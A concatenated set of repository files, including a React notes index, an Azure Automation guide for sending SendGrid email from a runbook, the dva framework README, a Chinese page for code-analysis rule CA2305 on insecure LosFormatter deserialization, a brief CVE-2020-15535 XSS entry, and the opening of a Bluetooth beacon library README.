本文档主要用于记录 React 的一些运用,和通过阅读 React 相关技术栈的源码,来更深层次的学习,读源码不是为了造一个同样的轮子,而是从别人的代码中学习到更多的知识,写出更好的运用方法。
目录:
- [React使用总结](./React使用总结.md)
- [Redux源码探索](./Redux源码探索.md)
- [React常见面试题](./React常见面试题.md)
- [React源码深入浅出](./React源码深入浅出.md)
| 20.769231 | 96 | 0.759259 | yue_Hant | 0.441501 |
61d9baf6fdb7548408441e4c66028161e04f7bf5 | 7,363 | md | Markdown | articles/automation/automation-send-email.md | Seacloud1/azure-docs | 991df2af69b0ce05af86c7060ee588ebc14d8037 | [
"CC-BY-4.0",
"MIT"
] | 4 | 2021-11-22T02:45:17.000Z | 2022-03-22T07:08:33.000Z | articles/automation/automation-send-email.md | Seacloud1/azure-docs | 991df2af69b0ce05af86c7060ee588ebc14d8037 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/automation/automation-send-email.md | Seacloud1/azure-docs | 991df2af69b0ce05af86c7060ee588ebc14d8037 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-01-09T16:27:39.000Z | 2021-01-09T16:27:39.000Z | ---
title: Send an email from an Azure Automation runbook
description: This article tells how to send an email from within a runbook.
services: automation
ms.subservice: process-automation
ms.date: 07/15/2019
ms.topic: conceptual
---
# Send an email from a runbook
You can send an email from a runbook with [SendGrid](https://sendgrid.com/solutions) using PowerShell.
## Prerequisites
* Azure subscription. If you don't have one yet, you can [activate your MSDN subscriber benefits](https://azure.microsoft.com/pricing/member-offers/msdn-benefits-details/) or sign up for a [free account](https://azure.microsoft.com/free/?WT.mc_id=A261C142F).
* [A SendGrid account](../sendgrid-dotnet-how-to-send-email.md#create-a-sendgrid-account).
* [Automation account](./index.yml) with **Az** modules.
* [Run As account](./manage-runas-account.md) to store and execute the runbook.
## Create an Azure Key Vault
You can create an Azure Key Vault using the following PowerShell script. Replace the variable values with values specific to your environment. Use the embedded Azure Cloud Shell via the **Try It** button, located in the top right corner of the code block. You can also copy and run the code locally if you have the [Az modules](/powershell/azure/install-az-ps) installed on your local machine.
> [!NOTE]
> To retrieve your API key, use the steps in [Find your SendGrid API key](../sendgrid-dotnet-how-to-send-email.md#to-find-your-sendgrid-api-key).
```azurepowershell-interactive
$SubscriptionId = "<subscription ID>"
# Sign in to your Azure account and select your subscription
# If you omit the SubscriptionId parameter, the default subscription is selected.
Connect-AzAccount -SubscriptionId $SubscriptionId
# Use Get-AzLocation to see your available locations.
$region = "southcentralus"
$KeyVaultResourceGroupName = "mykeyvaultgroup"
$VaultName = "<Enter a universally unique vault name>"
$SendGridAPIKey = "<SendGrid API key>"
$AutomationAccountName = "testaa"
# Create new Resource Group, or omit this step if you already have a resource group.
New-AzResourceGroup -Name $KeyVaultResourceGroupName -Location $region
# Create the new key vault
$newKeyVault = New-AzKeyVault -VaultName $VaultName -ResourceGroupName $KeyVaultResourceGroupName -Location $region
$resourceId = $newKeyVault.ResourceId
# Convert the SendGrid API key into a SecureString
$Secret = ConvertTo-SecureString -String $SendGridAPIKey -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $VaultName -Name 'SendGridAPIKey' -SecretValue $Secret
# Grant access to the Key Vault to the Automation Run As account.
$connection = Get-AzAutomationConnection -ResourceGroupName $KeyVaultResourceGroupName -AutomationAccountName $AutomationAccountName -Name AzureRunAsConnection
$appID = $connection.FieldDefinitionValues.ApplicationId
Set-AzKeyVaultAccessPolicy -VaultName $VaultName -ServicePrincipalName $appID -PermissionsToSecrets Set, Get
```
For other ways to create an Azure Key Vault and store a secret, see [Key Vault quickstarts](../key-vault/index.yml).
## Import required modules into your Automation account
To use Azure Key Vault within a runbook, you must import the following modules into your Automation account:
* [Az.Profile](https://www.powershellgallery.com/packages/Az.Profile)
* [Az.KeyVault](https://www.powershellgallery.com/packages/Az.KeyVault)
For instructions, see [Import Az modules](shared-resources/modules.md#import-az-modules).
## Create the runbook to send an email
After you have created a Key Vault and stored your `SendGrid` API key, it's time to create the runbook that retrieves the API key and sends an email. Let's use a runbook that uses `AzureRunAsConnection` as a [Run As account](./manage-runas-account.md) to
authenticate with Azure to retrieve the secret from Azure Key Vault. We'll call the runbook **Send-GridMailMessage**. You can modify the PowerShell script used for example purposes, and reuse it for different scenarios.
1. Go to your Azure Automation account.
2. Under **Process Automation**, select **Runbooks**.
3. At the top of the list of runbooks, select **+ Create a runbook**.
4. On the Add Runbook page, enter **Send-GridMailMessage** for the runbook name. For the runbook type, select **PowerShell**. Then, select **Create**.

5. The runbook is created and the Edit PowerShell Runbook page opens.

6. Copy the following PowerShell example into the Edit page. Ensure that the `VaultName` specifies the name you've chosen for your Key Vault.
```powershell-interactive
Param(
[Parameter(Mandatory=$True)]
[String] $destEmailAddress,
[Parameter(Mandatory=$True)]
[String] $fromEmailAddress,
[Parameter(Mandatory=$True)]
[String] $subject,
[Parameter(Mandatory=$True)]
[String] $content
)
$Conn = Get-AutomationConnection -Name AzureRunAsConnection
Connect-AzAccount -ServicePrincipal -Tenant $Conn.TenantID -ApplicationId $Conn.ApplicationID -CertificateThumbprint $Conn.CertificateThumbprint | Out-Null
$VaultName = "<Enter your vault name>"
$SENDGRID_API_KEY = (Get-AzKeyVaultSecret -VaultName $VaultName -Name "SendGridAPIKey").SecretValue
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", "Bearer " + $SENDGRID_API_KEY)
$headers.Add("Content-Type", "application/json")
$body = @{
personalizations = @(
@{
to = @(
@{
email = $destEmailAddress
}
)
}
)
from = @{
email = $fromEmailAddress
}
subject = $subject
content = @(
@{
type = "text/plain"
value = $content
}
)
}
$bodyJson = $body | ConvertTo-Json -Depth 4
$response = Invoke-RestMethod -Uri https://api.sendgrid.com/v3/mail/send -Method Post -Headers $headers -Body $bodyJson
```
7. Select **Publish** to save and publish the runbook.
To verify that the runbook executes successfully, you can follow the steps under [Test a runbook](manage-runbooks.md#test-a-runbook) or [Start a runbook](start-runbooks.md).
If you don't initially see your test email, check your **Junk** and **Spam** folders.
## Clean up resources after the email operation
1. When the runbook is no longer needed, select it in the runbook list and click **Delete**.
2. Delete the Key Vault by using the [Remove-AzKeyVault](/powershell/module/az.keyvault/remove-azkeyvault?view=azps-3.7.0) cmdlet.
```azurepowershell-interactive
$VaultName = "<your KeyVault name>"
$ResourceGroupName = "<your ResourceGroup name>"
Remove-AzKeyVault -VaultName $VaultName -ResourceGroupName $ResourceGroupName
```
## Next steps
* To send runbook job data to your Log Analytics workspace, see [Forward Azure Automation job data to Azure Monitor logs](automation-manage-send-joblogs-log-analytics.md).
* To monitor base-level metrics and logs, see [Use an alert to trigger an Azure Automation runbook](automation-create-alert-triggered-runbook.md).
* To correct issues arising during runbook operations, see [Troubleshoot runbook issues](./troubleshoot/runbooks.md).
| 47.811688 | 393 | 0.742904 | eng_Latn | 0.653003 |
61dabf784fa8f5aac344bb7ec00c1e6dd68a62dd | 4,548 | md | Markdown | README.md | Yashiro/dva | ac287ac48259eb37a2e8eab222e8aca6cb4f7669 | [
"MIT"
] | null | null | null | README.md | Yashiro/dva | ac287ac48259eb37a2e8eab222e8aca6cb4f7669 | [
"MIT"
] | null | null | null | README.md | Yashiro/dva | ac287ac48259eb37a2e8eab222e8aca6cb4f7669 | [
"MIT"
] | null | null | null | # dva
[](https://npmjs.org/package/dva)
[](https://travis-ci.org/dvajs/dva)
[](https://coveralls.io/r/dvajs/dva)
[](https://npmjs.org/package/dva)
[](https://david-dm.org/dvajs/dva)
[](https://gitter.im/dvajs/Lobby?utm_source=share-link&utm_medium=link&utm_campaign=share-link)
[以中文查看](./README_zh-CN.md)
Lightweight front-end framework based on [redux](https://github.com/reactjs/redux), [redux-saga](https://github.com/yelouafi/redux-saga) and [[email protected]](https://github.com/ReactTraining/react-router/tree/v2.8.1). (Inspired by [elm](http://elm-lang.org/) and [choo](https://github.com/yoshuawuyts/choo))
---
## Features
* **Easy to learn, easy to use**: only 6 apis, very friendly to redux users
* **Elm concepts**: organize models with `reducers`, `effects` and `subscriptions`
* **Support mobile and react-native**: cross platform ([ReactNative Example](https://github.com/sorrycc/dva-example-react-native))
* **Support HMR**: support HMR for components, routes and models with [babel-plugin-dva-hmr](https://github.com/dvajs/babel-plugin-dva-hmr)
* **Support load model and routes dynamically**: Improve performance ([Example](https://github.com/dvajs/dva/tree/master/examples/dynamic-load))
* **Plugin system**: e.g. we have [dva-loading](https://github.com/dvajs/dva-loading) plugin to handle loading state automatically
* **Support TypeScript**:with d.ts ([Example](https://github.com/sorrycc/dva-boilerplate-typescript))
## Why dva ?
* [Why dva and what's dva](https://github.com/dvajs/dva/issues/1)
* [支付宝前端应用架构的发展和选择](https://www.github.com/sorrycc/blog/issues/6)
## Demos
* [Count](https://github.com/dvajs/dva/blob/master/examples/count) ([jsfiddle](https://jsfiddle.net/puftw0ea/3/)): Simple count example
* [User Dashboard](https://github.com/dvajs/dva-example-user-dashboard): User management dashboard
* [HackerNews](https://github.com/dvajs/dva-hackernews) ([Demo](https://dvajs.github.io/dva-hackernews/)): HackerNews Clone
* [antd-admin](https://github.com/zuiidea/antd-admin) ([Demo](http://zuiidea.github.io/antd-admin/)): Admin dashboard based on antd and dva
* [github-stars](https://github.com/sorrycc/github-stars) ([Demo](http://sorrycc.github.io/github-stars/#/?_k=rmj86f)),Github Star management tool
* [react-native-dva-starter](https://github.com/nihgwu/react-native-dva-starter) a React Native starter powered by dva and react-navigation
## Quick Start
- [Getting Started](https://github.com/dvajs/dva/blob/master/docs/GettingStarted.md)
- [12 步 30 分钟,完成用户管理的 CURD 应用 (react+dva+antd)](https://github.com/sorrycc/blog/issues/18)
## FAQ
### Why is it called dva?
> D.Va’s mech is nimble and powerful — its twin Fusion Cannons blast away with autofire at short range, and she can use its Boosters to barrel over enemies and obstacles, or deflect attacks with her projectile-dismantling Defense Matrix.
—— From [OverWatch](http://ow.blizzard.cn/heroes/dva)
<img src="https://zos.alipayobjects.com/rmsportal/psagSCVHOKQVqqNjjMdf.jpg" width="200" height="200" />
### Is it production ready?
Sure! We have 100+ projects using dva, both in Alibaba and out.
### Does it support IE8?
No.
## Next
Some basic articles.
* The [8 Concepts](https://github.com/dvajs/dva/blob/master/docs/Concepts.md), and know how they are connected together
* [dva APIs](https://github.com/dvajs/dva/blob/master/docs/API.md)
* Checkout [dva knowledgemap](https://github.com/dvajs/dva-knowledgemap), including all the basic knowledge with ES6, React, dva
* Checkout [more FAQ](https://github.com/dvajs/dva/issues?q=is%3Aissue+is%3Aclosed+label%3Afaq)
* If your project is created by [dva-cli](https://github.com/dvajs/dva-cli), checkout how to [Configure it](https://github.com/sorrycc/roadhog/blob/master/README_en-us.md#configuration)
Want more?
* 看看 dva 的前身 [React + Redux 最佳实践](https://github.com/sorrycc/blog/issues/1),知道 dva 是怎么来的
* 在 gitc 分享 dva 的 PPT :[React 应用框架在蚂蚁金服的实践](http://slides.com/sorrycc/dva)
* 如果还在用 [email protected],请尽快 [升级到 1.x](https://github.com/dvajs/dva/pull/42#issuecomment-241323617)
## License
[MIT](https://tldrlegal.com/license/mit-license)
| 55.463415 | 309 | 0.739666 | yue_Hant | 0.301635 |
61db091244e23acb42a5424f73fe04da615bb4e5 | 2,170 | md | Markdown | docs/fundamentals/code-analysis/quality-rules/ca2305.md | yowko/docs.zh-tw | df9937e9a8e270b3435461133c7c70c717bea354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/fundamentals/code-analysis/quality-rules/ca2305.md | yowko/docs.zh-tw | df9937e9a8e270b3435461133c7c70c717bea354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/fundamentals/code-analysis/quality-rules/ca2305.md | yowko/docs.zh-tw | df9937e9a8e270b3435461133c7c70c717bea354 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'CA2305:請勿使用不安全的還原序列化程式 LosFormatter (程式碼分析) '
description: 瞭解程式碼分析規則 CA2305:不要使用不安全的還原序列化程式 LosFormatter
ms.date: 05/01/2019
ms.topic: reference
author: dotpaul
ms.author: paulming
dev_langs:
- CSharp
- VB
f1_keywords:
- CA2305
- DoNotUseInsecureDeserializerLosFormatter
ms.openlocfilehash: ea1533d1174b33f34ac36f6141ea8f393afd454d
ms.sourcegitcommit: 2e4adc490c1d2a705a0592b295d606b10b9f51f1
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 09/25/2020
ms.locfileid: "96585270"
---
# <a name="ca2305-do-not-use-insecure-deserializer-losformatter"></a>CA2305:請勿使用不安全的還原序列化程式 LosFormatter
| | 值 |
|-|-|
| **規則識別碼** |CA2305|
| **類別** |Microsoft.Security|
| **修正程式中斷或未中斷** |非中斷|
## <a name="cause"></a>原因
<xref:System.Web.UI.LosFormatter?displayProperty=nameWithType>呼叫或參考了還原序列化方法。
## <a name="rule-description"></a>規則描述
[!INCLUDE[insecure-deserializers-description](~/includes/code-analysis/insecure-deserializers-description.md)]
此規則會尋找還原序列化 <xref:System.Web.UI.LosFormatter?displayProperty=nameWithType> 方法呼叫或參考。
`LosFormatter` 是不安全的,且無法進行安全。 如需詳細資訊,請參閱 [BinaryFormatter 安全性指南](../../../standard/serialization/binaryformatter-security-guide.md)。
## <a name="how-to-fix-violations"></a>如何修正違規
- 請改用安全的序列化程式,而且 **不允許攻擊者指定任意類型來** 還原序列化。 如需詳細資訊,請參閱 [慣用的替代方案](../../../standard/serialization/binaryformatter-security-guide.md#preferred-alternatives)。
- 使序列化的資料無法進行篡改。 在序列化之後,以密碼編譯方式簽署序列化的資料。 在還原序列化之前,請先驗證密碼編譯簽章。 保護密碼編譯金鑰免于洩漏和設計金鑰輪替。
## <a name="when-to-suppress-warnings"></a>隱藏警告的時機
`LosFormatter` 是不安全的,且無法進行安全。
## <a name="pseudo-code-examples"></a>虛擬程式碼範例
### <a name="violation"></a>違規
```csharp
using System.IO;
using System.Web.UI;
public class ExampleClass
{
public object MyDeserialize(byte[] bytes)
{
LosFormatter formatter = new LosFormatter();
return formatter.Deserialize(new MemoryStream(bytes));
}
}
```
```vb
Imports System.IO
Imports System.Web.UI
Public Class ExampleClass
Public Function MyDeserialize(bytes As Byte()) As Object
Dim formatter As LosFormatter = New LosFormatter()
Return formatter.Deserialize(New MemoryStream(bytes))
End Function
End Class
```
| 27.468354 | 153 | 0.753456 | yue_Hant | 0.242314 |
61db4054b190bbce5115ae049d815a6b3cd2db71 | 680 | md | Markdown | 2020/CVE-2020-15535.md | wisdark/cve | 6ac24186f7625b12269a07a8e4c5437e624ccaa0 | [
"MIT"
] | 1 | 2022-02-25T09:08:49.000Z | 2022-02-25T09:08:49.000Z | 2020/CVE-2020-15535.md | Jeromeyoung/cve | 9113f2d909fddfaf554d5e8b90f9ed402f0fa81e | [
"MIT"
] | null | null | null | 2020/CVE-2020-15535.md | Jeromeyoung/cve | 9113f2d909fddfaf554d5e8b90f9ed402f0fa81e | [
"MIT"
] | 3 | 2022-03-11T00:38:35.000Z | 2022-03-19T04:01:22.000Z | ### [CVE-2020-15535](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15535)



### Description
An issue was discovered in the bestsoftinc Car Rental System plugin through 1.3 for WordPress. Persistent XSS can occur via any of the registration fields.
### POC
#### Reference
- https://packetstormsecurity.com/files/157118/WordPress-Car-Rental-System-1.3-Cross-Site-Scripting.html
#### Github
No PoCs found on GitHub currently.
| 37.777778 | 155 | 0.755882 | kor_Hang | 0.213983 |
61db8cdbe8c429335b653f3cdef65edf007a2ae0 | 122 | md | Markdown | README.md | 12vanblart/TweetAnalysis | f1e46590fe5bc691746a9ad94e1c89f627a6b1bd | [
"MIT"
] | null | null | null | README.md | 12vanblart/TweetAnalysis | f1e46590fe5bc691746a9ad94e1c89f627a6b1bd | [
"MIT"
] | null | null | null | README.md | 12vanblart/TweetAnalysis | f1e46590fe5bc691746a9ad94e1c89f627a6b1bd | [
"MIT"
] | null | null | null | # TweetAnalysis
## Use
From the directory, run `python .\main.py` and follow the instructions provided in the terminal.
| 24.4 | 97 | 0.754098 | eng_Latn | 0.998678 |
61dbd5a70da7ca9c8543a4b7099ea495d6e12f8c | 2,056 | md | Markdown | _posts/blog/2019-10-23-1209. Remove All Adjacent Duplicates in String II.md | js8544/js8544.github.io | d37e1f8c95a36306653007b36fb17e533e997d7f | [
"MIT"
] | null | null | null | _posts/blog/2019-10-23-1209. Remove All Adjacent Duplicates in String II.md | js8544/js8544.github.io | d37e1f8c95a36306653007b36fb17e533e997d7f | [
"MIT"
] | null | null | null | _posts/blog/2019-10-23-1209. Remove All Adjacent Duplicates in String II.md | js8544/js8544.github.io | d37e1f8c95a36306653007b36fb17e533e997d7f | [
"MIT"
] | 2 | 2019-05-14T07:34:07.000Z | 2019-05-14T09:06:44.000Z | ---
layout: post
title: "Remove All adjacent Duplicates in String II"
modified:
categories: blog
excerpt:
tags: [leetcode]
image:
feature:
date: 2019-10-23
---
Given a string `s`, a *k* *duplicate removal* consists of choosing `k` adjacent and equal letters from `s` and removing them causing the left and the right side of the deleted substring to concatenate together.
We repeatedly make `k` duplicate removals on `s` until we no longer can.
Return the final string after all such duplicate removals have been made.
It is guaranteed that the answer is unique.
**Example 1:**
```
Input: s = "abcd", k = 2
Output: "abcd"
Explanation: There's nothing to delete.
```
**Example 2:**
```
Input: s = "deeedbbcccbdaa", k = 3
Output: "aa"
Explanation:
First delete "eee" and "ccc", get "ddbbbdaa"
Then delete "bbb", get "dddaa"
Finally delete "ddd", get "aa"
```
**Example 3:**
```
Input: s = "pbbcggttciiippooaais", k = 2
Output: "ps"
```
**Constraints:**
- `1 <= s.length <= 10^5`
- `2 <= k <= 10^4`
- `s` only contains lower case English letters.
**Solution:**
Iterate from left to right, maintain a cound of how many consecutive chars we have at position i and a result string. Whenever the count reaches k we remove k elements.
```c++
class Solution {
public:
string removeDuplicates(string s, int k) {
string cur = "";
vector<int> dp(s.size()+1, 0);
for(int i = 1; i<=s.size();i++){
if(cur.empty()){
cur += s[i-1];
dp[i] = 1;
}else{
if(cur[cur.size()-1] == s[i-1]){
cur += s[i-1];
dp[cur.size()] = dp[cur.size()-1]+1;
if(dp[cur.size()] == k){
cur = cur.substr(0,cur.size()-k);
}
}else{
cur += s[i-1];
dp[cur.size()] = 1;
}
}
// cout<<cur<<" "<<dp[cur.size()]<<"\n";
}
return cur;
}
};
```
| 21.195876 | 210 | 0.537938 | eng_Latn | 0.953995 |
61dc1efad4b0a11239488afa868d005fcb071c41 | 7,265 | md | Markdown | julia/code_backup.md | Jonson-Sun/C-plus-plus | 98f87a2751a14372ea9f17ebdb1709d8afdb0b3c | [
"MIT"
] | null | null | null | julia/code_backup.md | Jonson-Sun/C-plus-plus | 98f87a2751a14372ea9f17ebdb1709d8afdb0b3c | [
"MIT"
] | null | null | null | julia/code_backup.md | Jonson-Sun/C-plus-plus | 98f87a2751a14372ea9f17ebdb1709d8afdb0b3c | [
"MIT"
] | null | null | null |
# julia 代码备份
$$e^{ix}=cos(x)+isin(x)$$
傅立叶变换的公式:
$$X_k=\sum^{N-1}_{n=0} x_n \times e^{-i2\pi kn/N}$$
```julia
function 图片转md()
# md 的图片信息
# ls>>tmp.txt
tmp=""
str_vec=readlines("tmp.txt")
for item in str_vec
tmp="<br>"
println(tmp)
end
end
#图片转md()
function 特殊符号表()
内容=repeat("-|",20)*"\n"*repeat(":-:|",20)*"\n"
for i=1:5_0000
内容*=string(i)*"|&#"*string(i)*";|"
if i%10==0
内容*="\n"
end
end
write("符号表.md",内容)
@info "运行完成"
sleep(5)
end
#特殊符号表()
function stat_Char()
#exit=UInt[]
#str_vec=Char[]
count=0
tmp_str=""
for i=1:2^32
if isvalid(Char,i)
#push!(exit,i)
#push!(str_vec,Char(i))
tmp_str *="$(i) $(Char(i))\n"
else
#push!(noexit,i)
count+=1
end
end
#@info "存在的元素为$(length(exit))" #111_2063
#@info "不存在的元素为$(count)个" #42_9385_5233
#@info "最大的元素值为:$(maximum(exit)),$(minimum(exit))"
write("utf8.txt",tmp_str) #14M
end
#stat_Char() #utf8编码表
```
## 类似gunplot的画图函数
```julia
#using PyPlot
function 串序列转换为正整数(X)
newX=[]
for item in X
push!(newX,parse(Int,item))
end
return newX
end
function 串序列转换为浮点数(Y)
newY=[]
for item in Y
push!(newY,parse(Float32,item))
end
return newY
end
function 数据处理(数据文件名="data.txt",分隔符="\t")
数据行=readlines(数据文件名)
X=[]
Y=[]
Y1=[]
for 元素 in 数据行
x,y,y1=split(元素,分隔符)
#三个元素赋值给两个元素的话,多余的元素舍弃
push!(X,x)
push!(Y,y)
push!(Y1,y1)
end
return X,Y,Y1
end
function 差值(Y)
newY=[]
for i=2:length(Y)
push!(newY,(Y[i]-Y[i-1]))
end
return newY
end
function 画图()
title("标题:宏观负债率")
X,Y,Y1=数据处理()
X=串序列转换为浮点数(X)
Y=串序列转换为浮点数(Y)
Y1=串序列转换为浮点数(Y1)
#plot(X,Y,"bo--",label="居民负债率")
plot(X[2:end],差值(Y),label="居民负债变化率")
#plot(X,Y1,"r^-",label="实体企业负债率")
#plot(X[2:end],差值(Y1),label="企业负债变化率")
grid()
legend()
show()
end
#画图()
```
```julia
# 10年翻了60倍,每年翻多少?
# n年翻了y倍,每年翻多少(x)?
function 年均增速计算(年数,倍数)
base,start=0.0,10.0
#@info base,start
#二分查找
function 比较(x) return (x^年数<倍数 ? true : false) end
function 平均(a,b) return (a+b)/2 end
while 比较(start)
start*=2
end
for i=1:20 #精度控制在小数点后四位
tmp=平均(base,start)
if 比较(tmp)
base=tmp
else
start=tmp
end
#@info "执行次数$i;取值区间$base ~ $start"
end
return 平均(base,start)
end
@time @info 年均增速计算(10,60)
@time @info 年均增速计算(3.5,60000)
@time @info 年均增速计算(20,0.2)
```
## 计算2^1000的按位 加和

```julia
function 指数(num::Int,init::Int=2) #计算指数
tmp::BigInt=init
return tmp^num
end
function sum_bigInt() #计算2^1000的位值加和
function char2num(item::Char)
table=Dict(['0'=>0,'1'=>1,'2'=>2,'3'=>3,'4'=>4,'5'=>5,
'6'=>6,'7'=>7,'8'=>8,'9'=>9])
if item in keys(table)
return table[item]
end
end
num::Int=0
tmp_str=repr(指数(1000))
for char in tmp_str
num+=char2num(char)
end
@info "位数为:$(length(tmp_str))"
@info "2^1000:加和的结果为 $num ."
@info "每一位上的平均值为:$(num/length(tmp_str))"
@show tmp_str
end
sum_bigInt() #结果是1366
```
## 有序数据->无序数据
```julia
#
# 排序的逆向操作
# 有序数据->无序数据
#
function 交换(arr::Array,p1::Int,p2::Int)
tmp::Int=arr[p1]
arr[p1]=arr[p2]
arr[p2]=tmp
end
function 打散数据!(arr::Array) #使用随机数 进行交换
size=length(arr)
系数=1
#0.3 0.5 0.6 0.7 0.8 0.9 1 1.2 2
#50 37 31 27 21 15 10 10 3
for i=1:Int(round(size*系数))
交换(arr,rand(1:size),rand(1:size))
end
end
function 打散数据2!(arr::Array)
size=length(arr)
系数=0.8
for i=1:Int(round(size*系数))
交换(arr,rand(1:size),rand(1:size))
end
tmp=arr[1]
for i=1:(size-1)
arr[i]=arr[i+1]
end
arr[size]=tmp
end
function 相似度检验(arr1::Array,arr2::Array)
size1=length(arr1)
size2=length(arr2)
@assert size1==size2 "两个集合的项数不等."
count::Int=0
for i=1:size1
if arr1[i]==arr2[i] count+=1 end
end
return round((count/size1),digits=4)
end
function test()
arr::Array=[]
arr_tmp::Array=[]
for i=1:100000 push!(arr,i);push!(arr_tmp,i) end
#@info arr[40:50]
#打散数据!(arr)
打散数据2!(arr)
#@info arr[40:50]
result=相似度检验(arr_tmp,arr)
@info "两个数组的相似度为:$(result*100)%"
end
test()
```
## 寻找勾股数
```julia
"""
寻找勾股数(整数): 3,4,5 .......
a,b,c
(1) a不变,b(区间遍历) 寻找c
限制:c^2<a^2+b^2
(2) a+=1,重复(1)
"""
function 寻找勾股数(end_val::BigInt ) #无限大版本
a::BigInt=3;
b::BigInt=3;
c::BigInt=3;
区间=100
@info "计算勾股整数对 开始......"
while a < end_val
while b<(a+区间)
while c< Int( round(sqrt(a^2+b^2)+1) )
if c^2 ==(a^2+b^2)
#@info "$a 的平方$(a^2) + $b 平方$(b^2)==$c 的平方$(c^2)"
write(io,"$a,$b,$c \n ")
end
c+=1
end
b+=1
c=b
end
a+=1
b=a
flush(io)
end
@info "计算结束!"
end
function 寻找勾股数(end_val::Int)
a=3;
b=3;
c=3;
区间=100
@info "计算勾股整数对 开始......"
while a < end_val
while b<(a+区间)
while c< Int( round(sqrt(a^2+b^2)+1) )
if c^2 ==(a^2+b^2)
write(io,"$a,$b,$c \n ")
end
c+=1
end
b+=1
c=b
end
a+=1
b=a
rand(1:10)==7 ? flush(io) : continue ;#避免每次都flush,注意?:前后的空格
end
@info "计算结束!"
end
function 计算大指数(底数::Int,指数::Int) a::BigInt=底数;return a^指数 end
function test()
num::BigInt=2^30 #计算大指数(2,100) ;
#寻找勾股数(num)
寻找勾股数(100_0000)
end
io=open("tmp1.txt","w+") #io定义必须放在全局
@time test()
close(io)
```
##函数调用结构图
```julia
"""
建立函数调用结构图
功能:
1 获取本目录里的所有文件
2 逐个文件进行函数调用关系提取
3 将提取出的关系进行dot化
缘起:
dot的应用方式,
手写的话并不比图形化的软件方便
"""
function build_function_struct_graph()
function get_path(c::Channel)
#默认为本目录
for (root,dirs,files) in walkdir(".") # 1
for file in files
path=(root*"/"*file)
put!(c ,path)
end
end
end
function 函数内容提取(file_str) #2.1
# 提取出完整的函数内容 如: asd(){ ... }
rx=r"\w+?\(.*?\)\s*?\{(.|\n)*?\}"
#单词边界,word{ ... } 不能有空格
#写正则表达式的费力之处:你要覆盖所有的情况
#不能多也不能少
m=eachmatch(rx,file_str)
return collect(m)
end
function 函数识别(item)
#2.2
#识别str中的函数,并返回 函数名列表
#形式: a->{b,v,c,,d,s;b->{}}
rx=r"\w+?\("
m=eachmatch(rx,item)
vec= collect(m)
repr="\""*(popfirst!(vec).match)*")\"->"
for item in vec
repr=repr*"\""*(item.match)*")\","
end
return repr
end
function get_func_relation(file_path) # 2
relation= ""
@info file_path
file_str=""
for line in eachline(file_path,keep=true)
#keep=true :保持换行符号
file_str=file_str*line
end
for item in 函数内容提取(file_str)
str_exp=函数识别(item.match)
#item 是Regexmatch类型,item.match存储匹配的字串
str_exp=chop(str_exp) #chop : 去掉末尾的逗号||->
relation=relation*(endswith(str_exp,"-") ? chop(str_exp) : str_exp)*";"
#chop后有两种情况:->变为-,去掉,号
end
return relation #形式: a->b,v,c,,d,s;b->,; a->b,v,c,,d,s;b->{}
end
function 文件类型确认(file_name)
if !isfile(file_name) return false; end
if endswith(file_name,".c")
return true
else
return false
end
end
str_repr=""
for path_file in Channel(get_path)
if !文件类型确认(path_file) #去掉配置文件等无关项
continue
end
tmp=get_func_relation(path_file)
str_repr=str_repr*"\n"*tmp
#break #只执行一个C文件
end
str_repr="digraph function { \n "*str_repr*"\n }"
#@show str_repr
#写入文件
write("tmp.gv",str_repr)
@info "文件写入完成"
end
build_function_struct_graph()
#ERROR: LoadError: PCRE.exec error: JIT stack limit reached
#目录下的文件太多导致
#图像生成命令
# dot -Tsvg tmp.gv -O
#如何去掉语句
# if(){} switch(){} ...
```
### 三个示例:
- 前三张图片为systemd/src的三个子目录
- 文件横向太大可能显示异常,可到pict/下的查看src-*.svg
- 图片本地图片查看器显示异常,可用firefox打开.
- 第四张图片为纵向简单示例




| 16.325843 | 74 | 0.605506 | yue_Hant | 0.234823 |
61dc5df0f27531ede58b2844947546d747fc27a3 | 753 | md | Markdown | src/pages/news/2016-09-21-hurricanes-players-of-the-week.md | davidleger95/atlantic-football-league-www | e6ba607cc20ed915137e9dd799ce9f977b5790c6 | [
"MIT"
] | 1 | 2020-05-13T14:13:13.000Z | 2020-05-13T14:13:13.000Z | src/pages/news/2016-09-21-hurricanes-players-of-the-week.md | davidleger95/atlantic-football-league-www | e6ba607cc20ed915137e9dd799ce9f977b5790c6 | [
"MIT"
] | 18 | 2020-06-09T13:37:21.000Z | 2021-08-02T19:19:56.000Z | src/pages/news/2016-09-21-hurricanes-players-of-the-week.md | davidleger95/atlantic-football-league-www | e6ba607cc20ed915137e9dd799ce9f977b5790c6 | [
"MIT"
] | null | null | null | ---
templateKey: "news-post"
featuredpost: false
tags:
- migrated
date: 2016-09-21T00:00:00.000Z
title: Hurricanes Football Names Players of the Week
image: 2016-09-21-one.jpg
---
**Tuesday, September 20, 2016. Charlottetown –** Running back Andre Goulbourne, defensive end Liam Carter, and receiver Eugune McMinns, are the players of the week for the Hurricanes Football team. Andre Goulbourne had 13 carries for 120 yards; Carter had 2 quarterback sacks, 3 solo tackles and 6 shared tackles; and McMinns had kickoff and punt returns for 200 yards, and a kickoff return for an 80-yard touchdown in last Saturday’s game against the UNB Fredericton Red Bombers. The team’s first home game is this Saturday at 1 p.m. at UPEI Alumni Canada Games Place.
| 62.75 | 569 | 0.779548 | eng_Latn | 0.984313 |
61dc8d79b9e62d8aec5f9b3626f1f9ba1eea9df5 | 14,419 | md | Markdown | README.md | johb1507/universal-beacon | f375d7ee09144faab923635a80738f5a4aa8d2be | [
"Apache-2.0"
] | null | null | null | README.md | johb1507/universal-beacon | f375d7ee09144faab923635a80738f5a4aa8d2be | [
"Apache-2.0"
] | null | null | null | README.md | johb1507/universal-beacon | f375d7ee09144faab923635a80738f5a4aa8d2be | [
"Apache-2.0"
] | null | null | null | # Universal Bluetooth Beacon Library
Manage Bluetooth® Beacons through a cross-platform .NET Standard library. Get details for the open Eddystone™ Bluetooth beacon format from Google, as well as beacons comparable to Apple® iBeacon™. Supported on all platforms that are compatible to .NET Standard 1.3/2.0+ - including Windows 10, Xamarin (iOS, Android), Mac and Linux.
